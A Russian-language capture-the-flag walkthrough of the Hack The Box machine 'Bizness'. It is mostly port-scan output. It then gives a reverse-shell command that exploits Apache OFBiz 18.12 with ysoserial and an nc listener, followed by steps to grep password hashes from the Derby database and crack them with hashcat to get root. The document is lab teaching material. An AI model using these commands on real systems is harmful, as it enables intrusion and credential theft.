Telegram / Видео
Обзор сервисов
Стартуем решение машины с классического сканирования портов, воспользуемся для этого rustscan
:
$ rustscan --ulimit=5000 --range=1-65535 -a 10.129.25.30 -- -A -sC
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/user/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
[!] Looks like I didn't find any open ports for 10.129.25.30. This is usually caused by a high batch size.
*I used 4500 batch size, consider lowering it with 'rustscan -b <batch_size> -a <ip address>' or a comfortable number for your system.
Alternatively, increase the timeout if your ping is high. Rustscan -t 2000 for 2000 milliseconds (2s) timeout.
┌──(user㉿vm)-[~/htb/bizness]
└─$ ping 10.129.25.43
PING 10.129.25.43 (10.129.25.43) 56(84) bytes of data.
64 bytes from 10.129.25.43: icmp_seq=1 ttl=63 time=52.3 ms
64 bytes from 10.129.25.43: icmp_seq=2 ttl=63 time=54.2 ms
^C
--- 10.129.25.43 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 52.311/53.248/54.185/0.937 ms
┌──(user㉿vm)-[~/htb/bizness]
└─$ rustscan --ulimit=5000 --range=1-65535 -a 10.129.25.43 -- -A -sC
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/user/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.25.43:22
Open 10.129.25.43:80
Open 10.129.25.43:443
Open 10.129.25.43:44251
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A -sC" on ip 10.129.25.43
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-06 14:22 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:22
Completed NSE at 14:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:22
Completed NSE at 14:22, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:22
Completed NSE at 14:22, 0.00s elapsed
Initiating Ping Scan at 14:22
Scanning 10.129.25.43 [2 ports]
Completed Ping Scan at 14:22, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:22
Completed Parallel DNS resolution of 1 host. at 14:22, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 14:22
Scanning 10.129.25.43 [4 ports]
Discovered open port 443/tcp on 10.129.25.43
Discovered open port 22/tcp on 10.129.25.43
Discovered open port 44251/tcp on 10.129.25.43
Discovered open port 80/tcp on 10.129.25.43
Completed Connect Scan at 14:22, 0.05s elapsed (4 total ports)
Initiating Service scan at 14:22
Scanning 4 services on 10.129.25.43
Completed Service scan at 14:23, 13.48s elapsed (4 services on 1 host)
NSE: Script scanning 10.129.25.43.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 5.12s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 4.62s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
Nmap scan report for 10.129.25.43
Host is up, received syn-ack (0.052s latency).
Scanned at 2024-01-06 14:22:55 EST for 23s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0B2izYdzgANpvBJW4Ym5zGRggYqa8smNlnRrVK6IuBtHzdlKgcFf+Gw0kSgJEouRe8eyVV9iAyD9HXM2L0N/17+rIZkSmdZPQi8chG/PyZ+H1FqcFB2LyxrynHCBLPTWyuN/tXkaVoDH/aZd1gn9QrbUjSVo9mfEEnUduO5Abf1mnBnkt3gLfBWKq1P1uBRZoAR3EYDiYCHbuYz30rhWR8SgE7CaNlwwZxDxYzJGFsKpKbR+t7ScsviVnbfEwPDWZVEmVEd0XYp1wb5usqWz2k7AMuzDpCyI8klc84aWVqllmLml443PDMIh1Ud2vUnze3FfYcBOo7DiJg7JkEWpcLa6iTModTaeA1tLSUJi3OYJoglW0xbx71di3141pDyROjnIpk/K45zR6CbdRSSqImPPXyo3UrkwFTPrSQbSZfeKzAKVDZxrVKq+rYtd+DWESp4nUdat0TXCgefpSkGfdGLxPZzFg0cQ/IF1cIyfzo1gicwVcLm4iRD9umBFaM2E=
| 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFMB/Pupk38CIbFpK4/RYPqDnnx8F2SGfhzlD32riRsRQwdf19KpqW9Cfpp2xDYZDhA3OeLV36bV5cdnl07bSsw=
| 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOjcxHOO/Vs6yPUw6ibE6gvOuakAnmR7gTk/yE2yJA/3
80/tcp open http syn-ack nginx 1.18.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
443/tcp open ssl/http syn-ack nginx 1.18.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| tls-nextprotoneg:
|_ http/1.1
| tls-alpn:
|_ http/1.1
|_http-title: Did not follow redirect to https://bizness.htb/
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Issuer: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-14T20:03:40
| Not valid after: 2328-11-10T20:03:40
| MD5: b182:2fdb:92b0:2036:6b98:8850:b66e:da27
| SHA-1: 8138:8595:4343:f40f:937b:cc82:23af:9052:3f5d:eb50
| -----BEGIN CERTIFICATE-----
| MIIDbTCCAlWgAwIBAgIUcNuUwJFmLYEqrKfOdzHtcHum2IwwDQYJKoZIhvcNAQEL
| BQAwRTELMAkGA1UEBhMCVUsxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
| GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAgFw0yMzEyMTQyMDAzNDBaGA8yMzI4
| MTExMDIwMDM0MFowRTELMAkGA1UEBhMCVUsxEzARBgNVBAgMClNvbWUtU3RhdGUx
| ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcN
| AQEBBQADggEPADCCAQoCggEBAK4O2guKkSjwv8sruMD3DiDi1FoappVwDJ86afPZ
| XUCwlhtZD/9gPeXuRIy66QKNSzv8H7cGfzEL8peDF9YhmwvYc+IESuemPscZSlbr
| tSdWXVjn4kMRlah/2PnnWZ/Rc7I237V36lbsavjkY6SgBK8EPU3mAdHNdIBqB+XH
| ME/G3uP/Ut0tuhU1AAd7jiDktv8+c82EQx21/RPhuuZv7HA3pYdtkUja64bSu/kG
| 7FOWPxKTvYxxcWdO02GRXs+VLce+q8tQ7hRqAQI5vwWU6Ht3K82oftVPMZfT4BAp
| 4P4vhXvvcyhrjgjzGPH4QdDmyFkL3B4ljJfZrbXo4jXqp4kCAwEAAaNTMFEwHQYD
| VR0OBBYEFKXr9HwWqLMEFnr6keuCa8Fm7JOpMB8GA1UdIwQYMBaAFKXr9HwWqLME
| Fnr6keuCa8Fm7JOpMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEB
| AFruPmKZwggy7XRwDF6EJTnNe9wAC7SZrTPC1gAaNZ+3BI5RzUaOkElU0f+YBIci
| lSvcZde+dw+5aidyo5L9j3d8HAFqa/DP+xAF8Jya0LB2rIg/dSoFt0szla1jQ+Ff
| 6zMNMNseYhCFjHdxfroGhUwYWXEpc7kT7hL9zYy5Gbmd37oLYZAFQv+HNfjHnE+2
| /gTR+RwkAf81U3b7Czl39VJhMu3eRkI3Kq8LiZYoFXr99A4oefKg1xiN3vKEtou/
| c1zAVUdnau5FQSAbwjDg0XqRrs1otS0YQhyMw/3D8X+f/vPDN9rFG8l9Q5wZLmCa
| zj1Tly1wsPCYAq9u570e22U=
|_-----END CERTIFICATE-----
|_http-server-header: nginx/1.18.0
44251/tcp open tcpwrapped syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.68 seconds
Веб
Сразу же проверим, что у нас имеется на веб-сервере.
Добавим наш адрес в /etc/hosts
и попробуем пройти еще раз.
Обнаруживаем CMS Apache OFBiz.
По эндпоинту от этой CMS /control/login
обнаруживаем версию 18.12.
Используем POC для получения шелла (обратите внимание, что для работы ysoserial
нам нужна Java 11):
sudo apt install openjdk-11-jdk
sudo update-alternatives --config java # поменять на 11 версию
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar
rlwrap nc -rlvp 4242
python3 exploit.py https://bizness.htb shell 10.10.14.46:4242
Флаг пользователя
Повышение привилегий
В этой машине тяжело найти повышение, если не знать, где искать. Воспользуемся подсказкой и сделаем вот такой поиск:
$ find /opt/ofbiz -name "*.dat"
...
/opt/ofbiz/runtime/data/derby/ ...
...
Запомним каталог, перейдем в него и запустим хитрый grep:
cd /opt/ofbiz/runtime/data/derby/
grep -arin -o -E '(\w+\W+){0,5}password(\W+\w+){0,5}' .
Среди строк найдем наш хеш:
Посмотрим на реализацию хеширования пароля в ofbiz в файле HashCrypt.java. Хеш использует Base64 Safe URL кодирование.
С помощью CyberChef декодируем:
- From Base64 (алфавит URL Safe)
- To HEX (без разделителей)
https://hashcat.net/wiki/doku.php?id=example_hashes
Нам нужен режим SHA1 и солью (в нашем случае соль d
), это будет режим 120
из примеров hashcat.
Файл hash.txt
:
hash:salt
Брутфорс:
hashcat -a 0 -m 120 -O hash.txt rockyou.txt
С получившимся паролем логинимся как root
: